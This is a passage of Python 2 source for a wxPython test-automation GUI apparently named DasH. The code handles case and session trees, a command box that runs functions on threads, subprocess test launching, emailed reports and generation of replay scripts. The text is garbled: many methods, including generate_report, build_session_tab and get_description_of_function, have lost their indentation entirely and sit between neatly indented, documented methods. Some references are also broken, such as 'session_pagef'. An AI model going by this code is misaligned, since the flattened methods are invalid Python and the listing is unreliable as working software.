        self.m_file_editor.SetSizer(edit_sizer)
        right_sizer.Add(self.m_file_editor, 8, wx.ALL|wx.EXPAND, 1)
        right_sizer.Add(self.m_log, 2, wx.ALL|wx.EXPAND, 2)
        right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
        main_sizer.Add(right_sizer, 8, wx.EXPAND)
        self.SetSizer(main_sizer)
        ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
        self.SetIcon(ico)
        #th= threading.Thread(target=self.polling_running_cases)
        #th.start()
        #th = threading.Thread(target=self.polling_request_via_mail)
        #th.start()
        # Remote-trigger web interface runs on its own thread.
        threading.Thread(target=self.web_server_start).start()
        #tooltips bind
        self.case_suite_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        self.session_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        self.function_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        #wx.html.EVT_HTML_LINK_CLICKED wx.EVT_TEXT_URL, wx.EVT_TEXT_URL,
        self.m_log.Bind(wx.EVT_TEXT_URL, self.on_leftD_click_url_in_m_log)
        self.Bind(wx.EVT_IDLE, self.on_idle)
        self.last_time_call_on_idle = datetime.now()
        # Populate the three navigator trees and show the frame maximized.
        self.build_session_tab()
        self.build_suite_tree()
        self.build_function_tab()
        self.Show(True)
        self.Maximize()
    def on_close(self, event):
        """Main-frame close handler: restore the std streams, then flush state.

        Restores stdout/stderr that the redirector hijacked, hides the frame,
        and runs a best-effort shutdown: stop the web server, persist the
        entered commands as a script, mail a final report and close every
        open session tab.
        """
        try:
            self.alive =False
            # Restore the original streams the output redirector replaced.
            sys.stderr =self.redir.old_stderr
            sys.stdout = self.redir.old_stdout
            self.redir.close()
            event.Skip()
        except Exception as e:
            error(traceback.format_exc())
        self.Show(False)
        time.sleep(0.01)
        def close():
            # Best-effort teardown; individual failures must not block exit.
            try:
                self.web_daemon.shutdown()
            except:
                pass
            # Persist the recorded command sequence as a replayable script.
            self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
            if len(self.dict_test_report):
                self.mail_test_report("DASH TEST REPORT")
            # Close every session tab still open in the edit area.
            for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
                closing_page = self.edit_area.GetPage(index)
                if isinstance(closing_page, (SessionTab)):
                    if closing_page:
                        name = closing_page.name
                        self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
                        try:
                            closing_page.on_close()
                        except:
                            pass
        close()
        time.sleep(0.01)
        #sys.exit(0)
def generate_report(self, filename, report_all_cases=True):
#fixed 2017-11-19, 2017-10-21 no need to send whole report, just the updating part
def GetTime(duration):
from datetime import timedelta
sec = timedelta(seconds=int(duration))
d = datetime(1,1,1) + sec
#print("DAYS:HOURS:MIN:SEC")
return "%d:%d:%d:%d" % (d.day-1, d.hour, d.minute, d.second)
report_in_list =[['result',
'start_time',
'end_time',
'ProcessID',
'duration',
'duration',
'case_name','log']]
report = '''Test Report
RESULT,\tStart_Time,\tEnd_Time,\tPID,\tDuration(s),\tDuration(D:H:M:S)\tCase_Name,\tLog\n'''
with open(filename, 'w') as f:
if len(self.dict_test_report):
#f.write(report)
for pi in sorted(self.dict_test_report, key = lambda x: self.dict_test_report[x][1]):
case_name, start_time, end_time, duration, return_code ,proc, log_path =self.dict_test_report[pi][:7]
if return_code is None:
result = 'IP'
result_html = '<font color="blue">IP'
else:
result = return_code # 'FAIL' if return_code else 'PASS'
if result.lower() in ['pass']:
result_html= '<font color="green">PASS'
else:
result_html= '<font color="red">FAIL'
one_record = ['{}'.format(x) for x in [
result,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'{html_link} {file_path}'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
one_record_html = ['{}'.format(x) for x in [
result_html,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'<a href={html_link}>{file_path}</a>'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
report_in_list.append(one_record_html)
record = '\t'.join(one_record)
if result == 'IP':
report+=record+'\n'
else:
if report_all_cases:
report+=record+'\n'
self.mailed_case_pids.append(pi)
elif pi not in self.mailed_case_pids:
report+=record+'\n'
self.mailed_case_pids.append(pi)
else:
pass
from lib.common import array2htmltable
report_in_html_string = array2htmltable(report_in_list)
f.write(report_in_html_string)
return report
    def on_close_tab_in_edit_area(self, event):
        """Notebook tab-close handler: tear the page down on a worker thread
        and, for session tabs, close and unregister the live session."""
        #self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
        def close_tab():
            global gSessions
            closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
            closing_page.on_close()
            if isinstance(closing_page, (SessionTab)):
                ses_name = closing_page.name
                # Drop the tab name from the bookkeeping list.
                self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
                if gSessions.has_key( ses_name):
                    # globals().has_key(ses_name):
                    #g = dict(globals())
                    #globals()[ses_name]=None
                    #del g[ses_name]
                    gSessions[ses_name].close_session()
                    del gSessions[ses_name] #del globals()[ses_name]
        # Run off the GUI thread: close_session may block on I/O.
        threading.Thread(target=close_tab, args=[]).start()
        event.Skip()
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
self.case_list.append(path_name)
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
    @gui_event_decorator.gui_even_handle
    def build_suite_tree(self):
        """Build the Case tab tree rooted at the configured test-suite path."""
        suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
        # Fall back to the current directory when the configured path is gone.
        if not os.path.exists(suite_path):
            suite_path= os.path.abspath(os.path.curdir)
        base_name = os.path.basename(suite_path)
        root =self.case_suite_page.AddRoot(base_name)
        item_info = wx.TreeItemData({'path_name':suite_path})
        self.case_suite_page.SetItemData(root, item_info)
        self.add_item_to_subfolder_in_tree(root)
        self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self,event):
ht_item =self.case_suite_page.GetSelection()
try:
item_info = self.case_suite_page.GetPyData(ht_item)
if 0== self.case_suite_page.GetChildrenCount(ht_item):
if os.path.isdir(item_info['path_name']):
self.add_item_to_subfolder_in_tree(ht_item)
except Exception as e:
pass
@gui_event_decorator.gui_even_handle
def build_session_tab(self):
if self.session_page.RootItem:
self.session_pagef.DeleteAllItems()
self.ini_setting.read(self.ini_file)
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
error(traceback.format_exc())
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
    #@gui_event_decorator.gui_even_handle
    def on_LeftDClick_in_Session_tab(self, event):
        """Double-click on a session node: open a SessionTab for it.

        Picks a unique tab/variable name (suffixing _N, or prefixing _ when
        the name already exists in globals), creates the tab and registers
        the session so generated scripts can reference it.
        """
        ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
        self.session_page.GetItemText(self.session_page.GetSelection())
        session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
        if session_attribute.Data.has_key('attribute'):
            info(session_attribute.Data['attribute'])
            counter =1
            original_ses_name = ses_name
            # Rebuild the list of open tab names from the notebook itself.
            tmp_tabs =[]
            for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
                tab_page = self.edit_area.GetPage(index)
                #tab_page.name
                tmp_tabs.append(tab_page.name)
            self.tabs_in_edit_area = tmp_tabs
            # Suffix _1, _2, ... until the tab name is unique.
            while ses_name in self.tabs_in_edit_area:
                ses_name= '{}_{}'.format(original_ses_name,counter)
                counter+=1
            if globals().has_key(ses_name):
                if not globals().has_key('_{}'.format(ses_name)):
                    info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
                    ses_name='_{}'.format(ses_name)
                    self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
                else:
                    error(("variable '{}' is existed in global, please change the name".format(ses_name)))
                    return
            new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path+'/session_log')
            window_id = self.edit_area.AddPage(new_page, ses_name)
            index = self.edit_area.GetPageIndex(new_page)
            self.edit_area.SetSelection(index)
            self.tabs_in_edit_area.append(ses_name)
            self.sessions_alive.update({ses_name: new_page.name})
            attribute = session_attribute.Data['attribute']
            # Placeholder path: swapped for the script's own log_path variable
            # when the line is emitted (see add_new_session_to_globals).
            log_path='a_fake_log_path_for_auto_script'
            attribute['log_path']=log_path
            self.add_new_session_to_globals(new_page, '{}'.format(attribute))
            #globals().update({ses_name: new_page.session})
        time.sleep(0.1)
        event.Skip()
    def add_new_session_to_globals(self, new_page, args_str):
        """Register *new_page* (a SessionTab) under its name in the global DUT
        map and queue the matching `DUT[...] = dut.dut(...)` line for the
        generated script."""
        name = new_page.name
        global DUT
        #FIX ISSUE
        # INFO common.py:161 call_function_in_module:
        # module_name: xdsl
        # class_name: xdsl
        # function_name: get_eut
        # args:[wxPython wrapper for DELETED SessionTab object! (The C++ object no longer exists.)]
        # kwargs: {}
        # Exception in thread Thread-40:
        # Traceback (most recent call last):
        # File "C:\Python27\Lib\threading.py", line 801, in __bootstrap_inner
        # self.run()
        # File "C:\Python27\Lib\threading.py", line 754, in run
        # self.__target(*self.__args, **self.__kwargs)
        # File "C:\workspace\gDasH\src\xdsl.py", line 36, in get_eut
        # ses.write(cmd)
        # File "C:\Python27\lib\site-packages\wx-3.0-msw\wx\_core.py", line 16711, in __getattr__
        # raise PyDeadObjectError(self.attrStr % self._name)
        if name in DUT:
            try:
                # Touching .name raises PyDeadObjectError when the old wx page
                # was destroyed; in that case overwrite the slot below.
                # NOTE(review): when the old entry is still alive it is deleted
                # but new_page is never stored -- confirm this is intended.
                DUT[name].name
                del DUT[name]
            except :
                DUT[name]= new_page
        else:
            DUT[name]= new_page
        # Queue the construction line for the generated script: swap the
        # placeholder log path for the script's log_path variable and force
        # not_call_open to False so the replayed session actually opens.
        self.add_cmd_to_sequence_queue('DUT["{}"] = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
        #session = dut(name, **attributes)
    @gui_event_decorator.gui_even_handle
    def on_command_enter(self, event):
        """Execute the command(s) typed into the command box.

        Each line is parsed as `module.class.function args...` (or
        `module.function args...`), resolved against the loaded function
        objects, and run on a background thread so the GUI stays responsive.
        """
        info('called on_command_enter')
        cmd = self.m_command_box.GetValue()
        self.m_command_box.Clear()
        cmd = cmd.strip()
        cmds = cmd.replace('\r\n', '\n').split('\n')
        def handle_one_cmd(cmd):
            # Parse and dispatch one command line; commands whose target is
            # not a known function object are silently ignored.
            if cmd.strip()=='':
                return
            cmd_string = cmd.strip()
            lex = shlex.shlex(cmd_string)
            lex.quotes = '"'
            lex.whitespace_split = True
            cmd_list=list(lex)
            function_obj_name = cmd_list[0]
            if self.dict_function_obj.has_key(function_obj_name):
                call_function = self.dict_function_obj[function_obj_name]
            else:
                return
            module,class_name, function,args = parse_command_line(cmd)
            self.add_cmd_to_history(cmd, module, None, class_name)
            #args[0]=self.sessions_alive['test_ssh'].session
            if module !='' or class_name!='' or function!='':
                # Substitute argument names that refer to live DUT sessions.
                after_sub_args=[]
                for i in range(len(args)):
                    a = args[i]
                    if a in globals():
                        after_sub_args.append(a)
                    elif a in DUT:
                        after_sub_args.append('DUT["{}"]'.format(a))
                    else:
                        after_sub_args.append(a)
                function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,after_sub_args, globals())
                #call_function = None
                # if class_name!="":
                #
                # call_function = getattr(instance_name, function_name)
                # #(*new_argvs,**new_kwargs)
                # else:
                # call_function = instance_name#(*new_argvs,**new_kwargs)
                # Run on a worker thread so long calls don't block the GUI.
                th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
                th.start()
                #self.m_command_box.ShowPosition(len(self.m_command_box.GetString())+1)
                self.add_cmd_to_history(cmd, module, str_code, class_name)
            else:
                error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
        for cmd in cmds:
            try:
                handle_one_cmd(cmd)
            except:
                error(traceback.format_exc())
        event.Skip()
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
def on_key_down(self, event):
#error(event.KeyCode)
keycode = event.KeyCode
if keycode ==wx.WXK_TAB:
self.m_command_box.AppendText('\t')
self.on_command_enter(event)
elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
self.m_command_box.AppendText('?')
self.on_command_enter(event)
else:
event.Skip()
def on_key_up(self, event):
keycode = event.KeyCode
increase =False
if keycode ==wx.WXK_UP:
pass
elif keycode ==wx.WXK_DOWN:
increase =True#
if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
self.m_command_box.Clear()
self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
self.m_command_box.AppendText(new_command)
if keycode in [wx.WXK_TAB]:
pass
else:
event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code, class_name=""):
if str_code is None:
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
else:# str_code is not None:
self.add_cmd_to_sequence_queue(str_code,module_name, class_name )
#self.sequence_queue.put([cmd, datetime.now()])
def get_description_of_function(self, function_obj):
import inspect
fundefstr=''
try:
try:
fundef = inspect.getsource(function_obj) # recreate function define for binary distribute
fundefstr = fundef[:fundef.find(':')]
except Exception as e:
(args, varargs, keywords, defaults) =inspect.getargspec(function_obj)
argstring = ''
largs=len(args)
ldefaults= len(defaults)
gaplen = largs-ldefaults
index =0
for arg in args:
if index <gaplen:
argstring+='%s, '%arg
else:
defvalue = defaults[index-gaplen]
if type('')==type(defvalue):
defvalue = '"%s"'%defvalue
argstring+='%s = %s, '%(arg,str(defvalue))
index+=1
fundefstr ='%s( %s )'%(function_obj.func_name, argstring)
fundef =fundefstr
listoffun =fundef.split('\n')
ret = function_obj.__doc__
if ret:
fundefstr = fundefstr +'\n '+'\n '.join(ret.split('\n'))
except Exception as e:
pass
return fundefstr
@gui_event_decorator.gui_even_handle
def check_whether_function_file_is_updated(self):
for module_file in self.dict_function_files.keys():
old_modify_time = self.dict_function_files[module_file]
current_modify_time = os.path.getmtime(module_file)
if current_modify_time ==old_modify_time:
continue
else:
self.build_function_tab()
    @gui_event_decorator.gui_even_handle
    def build_function_tab(self):
        """(Re)build the Functions tab: import every module under src_path and
        list its functions and class methods as callable tree items.

        Objects from the previous build are closed/dropped first so modules
        can be re-imported after edits; file mtimes are recorded so
        check_whether_function_file_is_updated can poll for changes.
        """
        try:
            # Tear down objects from the previous build so re-import is clean.
            instances = self.dict_function_obj['instance'].keys()
            for inst_name in instances:
                inst = self.dict_function_obj['instance'][inst_name]
                print ('instance ref count',inst_name, sys.getrefcount(inst))
                if 'close' in dir(inst):
                    inst.close()
                del inst
            fun_list = self.dict_function_obj.keys()
            for fun_name in fun_list:
                inst = self.dict_function_obj[fun_name]
                print ('instance ref count',fun_name, sys.getrefcount(inst))
                del inst
            time.sleep(1)
            #import gc
            #gc.collect()
            self.dict_function_obj={'instance':{}}
            self.dict_function_files= {}
            src_path = os.path.abspath(self.src_path)
            if not os.path.exists(src_path):
                src_path= os.path.abspath(os.path.curdir)
            base_name = os.path.basename(src_path)
            root =self.function_page.AddRoot(base_name)
            item_info = wx.TreeItemData({'name':src_path})
            self.function_page.SetItemData(root, item_info)
            modules = get_folder_item(src_path)
            if modules is None:
                # Source folder vanished: flag the root in red and stop.
                self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
                self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
                return
            for module_file in modules:
                # Skip a .pyc when its .py source is present, and dunder files.
                if module_file.endswith('.pyc'):
                    if module_file[:-1] in modules:
                        continue
                if module_file.startswith('__'):
                    continue
                path_name = '{}'.format(os.path.abspath(self.src_path))
                module_name = os.path.basename(module_file).split('.')[0]
                extension = os.path.basename(module_file).split('.')[-1]
                full_name = '{}/{}'.format(path_name,module_file)
                if extension.lower() in ['py', 'pyc']:
                    try:
                        new_module = self.function_page.InsertItem(root, root, module_name)
                        module_file, path_name, description = imp.find_module(module_name)
                        lmod = imp.load_module(module_name, module_file, path_name,description)
                        # Record mtime for the change poller.
                        self.dict_function_files[full_name] = os.path.getmtime(full_name)
                        for attr in sorted(dir(lmod)):
                            if attr.startswith('__'):
                                continue
                            attr_obj = getattr(lmod, attr)
                            attr_type = type(attr_obj)
                            if attr_type == types.FunctionType :
                                # Plain function: one leaf item with a tooltip.
                                new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
                                fun_str = '{}.{}'.format(module_name,attr)
                                item_info = wx.TreeItemData({'name':fun_str,
                                                             'tip':self.get_description_of_function(attr_obj),
                                                             })
                                self.dict_function_obj[fun_str] = attr_obj
                                self.function_page.SetItemData(new_item, item_info)
                            elif attr_type== types.TypeType:
                                # Class: instantiate it and list its methods.
                                #class_obj = getattr(lmod, attr)
                                instance = getattr(lmod, attr)()
                                self.dict_function_obj['instance'][attr]=instance
                                new_class = self.function_page.InsertItem(new_module, new_module, attr)
                                item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
                                self.function_page.SetItemData(new_class, item_info)
                                for attr_in_class in sorted(dir(instance)):
                                    if attr_in_class.startswith('__'):
                                        continue
                                    attr_obj = getattr(instance,attr_in_class)
                                    attr_type =type(attr_obj)
                                    if attr_type == types.MethodType :
                                        fun_str = '{}.{}.{}'.format(module_name,attr,attr_in_class)
                                        item_info = wx.TreeItemData({'name':fun_str,
                                                                     'tip':self.get_description_of_function(attr_obj)})
                                        new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
                                        self.dict_function_obj[fun_str] = getattr(instance, attr_in_class)#attr_obj
                                        self.function_page.SetItemData(new_item, item_info)
                    except :
                        # Modules that fail to import/instantiate are skipped.
                        pass
            self.function_page.Expand(root)
            first_child = self.function_page.GetFirstChild(root)
            self.function_page.Expand(first_child[0])
        except Exception as e:
            print(traceback.format_exc())
def on_LeftDClick_in_Function_tab(self,event):
event.Skip()
select_item = self.function_page.GetSelection()
fun_name = self.function_page.GetItemData(select_item)
text_in_tree = self.function_page.GetItemText(select_item)
if fun_name != None and fun_name.Data.has_key('name'):
cmd = fun_name.Data['name']
info('click item in Functions tab: {}'.format(fun_name.Data['name']))
wx.CallAfter(self.m_command_box.Clear)
wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
wx.CallAfter(self.m_command_box.SetFocus)
wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
wx.CallAfter(self.m_command_box.Refresh)
def on_refresh_case_page(self, event):
self.case_suite_page.DeleteAllItems()
self.build_suite_tree()
info('Refresh Case tab done!')
def on_right_down_in_session_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_session_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_session_page(self, event):
self.session_page.DeleteAllItems()
self.build_session_tab()
info('Refresh Session tab done!')
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name, class_name=""):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:class_name})
self.sequence_queue.put([cmd,datetime.now() ])
    def generate_code(self, file_name ):
        """Emit a standalone Python script replaying every queued command.

        The script imports each recorded module, instantiates recorded
        classes, wraps the replayed statements in try/except, and closes any
        sessions it opened (exiting -1 on failure). Nothing is written when
        no operation was recorded.

        @param file_name: path the generated script is appended to.
        """
        #todo 2017-10-21 no code need, when no command entered at all
        # Script header: path setup, log folder creation, shared DUT map.
        str_code ="""#created by DasH {}
if __name__ == "__main__":
    import sys, traceback
    sys.path.insert(0,r'{}')
    sys.path.insert(0,r'{}')
    import common
    log_path= '../log/tmp'
    log_path= common.create_case_folder()
    DUT={}
    try:
""".format(datetime.now().isoformat('-'), self.src_path,self.lib_path , "{}")
        sessions =[]
        for module in self.import_modules:
            str_code+='        import {mod}\n'.format(mod=module)#\n {mod}_instance = {mod}()
        for module in self.import_modules:
            class_name = self.import_modules[module]
            if class_name!="":
                str_code+='        {mod}_instance = {mod}.{class_name}()\n'.format(mod=module, class_name=class_name)#\
        no_operation = True
        # Drain the queue of recorded statements into the script body.
        while True:
            try:
                cmd, timestamp =self.sequence_queue.get(block=False)[:2]
                str_code +='        {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
                if cmd.find('dut.dut(')!=-1:
                    # Remember opened sessions so the script can close them.
                    sessions.append(cmd.split('=')[0].strip())
                no_operation=False
                #datetime.now().isoformat()
            except Exception as e:
                # Queue empty: body complete.
                break
        close_session=''
        # Failure path: report, close sessions, exit non-zero.
        str_code+='''    except Exception as e:
        print(traceback.format_exc())\n'''
        for ses in sessions:
            str_code+='''        {}.close_session()\n'''.format(ses)
            no_operation=False
        str_code+='        sys.exit(-1)\n'#, sys.exit(-1)
        # Success path: close sessions after the try/except.
        for ses in sessions:
            str_code+='''    {}.close_session()\n'''.format(ses)
        info('code saved to file: ',file_name)
        info(str_code)
        info('code saved to file: ',file_name)
        if not no_operation:
            with open(file_name, 'a+') as f:
                f.write(str_code)
        else:
            info('No code will be saved to file, due to no operation was performed ',file_name)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
item3 = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
menu.AppendItem(item3)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.Bind(wx.EVT_MENU, self.on_refresh_case_page,item3)
self.PopupMenu(menu,event.GetPosition())
    def on_kill_script(self,event):
        """Context-menu handler: terminate the process attached to the
        selected case, or just record its result when already finished."""
        hit_item = self.case_suite_page.GetSelection()
        item_name = self.case_suite_page.GetItemText(hit_item)
        item_data = self.case_suite_page.GetItemData(hit_item).Data
        if item_data.has_key('PROCESS'):
            p = item_data['PROCESS']
            name= item_data['FULL_NAME']
            info('script:{}, returncode:{}'.format(name,p.returncode))
            if p.returncode is None:
                #if p.is_alive():
                # Still running: record as killed, mail an update, then kill.
                info('Terminate alive process {}:{}'.format(item_name, p.pid))
                result ='KILL'
                self.update_case_status(p.pid, result)
                self.mail_test_report("DASH TEST REPORT-updating")
                p.terminate()
            else:
                # Already finished: just record pass/fail from the exit code.
                result ='FAIL' if p.returncode else 'PASS'
                info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
                self.update_case_status(p.pid, result)
    def run_script(self, script_name):
        """Launch a test script in a separate console process.

        *script_name* may include arguments (double-quoted tokens are kept
        together); a bare file name is resolved against the suite path. The
        child runs via script_runner(.exe/.py) with a per-case log folder.

        @return: (Popen object, case log folder path).
        """
        old_script_name = script_name
        lex = shlex.shlex(script_name)
        lex.quotes = '"'
        lex.whitespace_split = True
        script_name_and_args = list(lex)
        script_args = script_name_and_args[1:]
        script_name = script_name_and_args[0]
        if script_name.find(os.path.sep)!=-1:
            pass
        else:
            # Bare name: resolve relative to the suite folder.
            script_name= '{}/{}'.format(self.suite_path,script_name)
        from lib.common import create_case_folder
        # create_case_folder presumably consults sys.argv, so swap it
        # temporarily around the call -- TODO confirm against lib.common.
        old_sys_argv = sys.argv
        sys.argv= [script_name]+script_args
        case_log_path = create_case_folder(self.log_path )#self.log_path #create_case_folder()
        sys.argv= old_sys_argv
        try:
            if os.path.exists('script_runner.exe'):
                execute = 'script_runner.exe'
                cmd = [execute,script_name ]+script_args + ['-l','{}'.format(case_log_path)]
                #p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
            else:
                cmd = [sys.executable,'./script_runner.py', script_name ]+script_args+ ['-l','{}'.format(case_log_path)]
            p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)#, stdin=pipe_input, stdout=pipe_output,stderr=pipe_output)
            self.add_new_case_to_report(p.pid, old_script_name, p, case_log_path)
        except:
            error(traceback.format_exc())
            # NOTE(review): if Popen itself raised, `p` is unbound here and
            # the return below raises NameError -- confirm intended behaviour.
        return p, case_log_path
    def on_run_script(self,event):
        """Context-menu handler: run the selected tree entry.

        A .txt/.csv entry is treated as a whole suite; anything else is a
        single case -- any previous run of it is killed first, then it is
        launched and the Popen handle stored back on the tree item.
        """
        hit_item = self.case_suite_page.GetSelection()
        item_name = self.case_suite_page.GetItemText(hit_item)
        item_data = self.case_suite_page.GetItemData(hit_item).Data
        script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
        if script_name.lower().split('.')[-1] in ['txt','csv']:#test suite file, not a single script
            self.run_a_test_suite(script_name)
        else:#a single test case
            self.on_kill_script(event)
            try:
                p, case_log_path = self.run_script('{} {}'.format(script_name, item_name.replace(os.path.basename(script_name), '')))
                # Keep the process handle on the item so kill/status work.
                self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
                self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
                info('start process {} :{}'.format(item_name, p.pid))
                #p.join() # this blocks until the process terminates
                time.sleep(1)
            except Exception as e :
                error(traceback.format_exc())
        #p = Process(target=run_script, args=[script_name, script_and_args])
        #p.start()
def check_case_status(self):
self.check_case_running_status_lock.acquire()
changed=False
running_case = 0
for pid in self.dict_test_report.keys():
